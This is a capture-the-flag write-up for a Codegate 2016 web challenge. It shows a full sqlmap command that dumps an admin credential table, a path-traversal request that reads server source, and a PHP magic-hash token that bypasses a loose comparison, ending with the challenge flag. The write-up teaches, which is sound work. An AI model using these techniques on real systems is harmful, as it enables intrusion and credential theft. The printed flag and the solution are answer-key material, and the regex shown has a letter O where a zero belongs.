2016, Codegate, CTF

English [Codegate CTF 2016] [Web 222 – Combination Pizza] Write Up

Leave a comment

Description

Description:

http://175.119.158.137:9242/f00885da9ad9ad5fcccaa8fc1217e3ae/

Shake Shake!!

Resolution

We have a usual blog with articles and a login page. We quickly find that the article view in vulnerable to a “AND boolean blind” SQL injection.

After using the tool sqlmap

python sqlmap.py -u 'http://175.119.158.137:9242/f00885da9ad9ad5fcccaa8fc1217e3ae/read.php?id=??' -p id --random-agent -D blog_db -T login --dump

We could extract the login table, with admin password 

+--------------------------------------------+--------+
| pass                                       | user   |
+--------------------------------------------+--------+
| 70e76a15da00e6301ade718cc9416f79 (adminpw) | Admin  |
+--------------------------------------------+--------+

We also need a token to login. We discovered in the blog table a hidden article only enabled for Admin.

+----+-----------------------------------------+--------+----------------------+---------+------------+------------------------------------------------------------------------------------------------------+
| id | file                                    | type   | title                | writer  | datetime   | contents                                                                                             |
+----+-----------------------------------------+--------+----------------------+---------+------------+------------------------------------------------------------------------------------------------------+
| 0  | <a href="down.php?fn=poem.jpg">down</a> | hidden | Secret File          | Admin   | 2016-03-09 | <p>Once More...</p>                                                                                  |

So the url down.php?fn=poem.jpg lets us download the poem.jpg, but also any file we want !

down.php?fn=../login_ck.php

for example ! In this file, we have this comparison :

if(md5("blog".$token) == '0e689047178306969035064392896674')

Because of php lossless comparison, we only need to find a token that matches the following regexp :

Oe[0-9]{30}

We quickly found one solution 

Found "blogAAAAUmhx" (0e746456162670701437168918944035)

So using the following credentials :

Username = admin
Password = adminpw
Token = AAAAUmhx

We got the flag

good job !!!
FLAG : jjambbong_WEBHACKING!!@!

Flag : jjambbong_WEBHACKING!!@!

Leave a Reply

Your email address will not be published. Required fields are marked *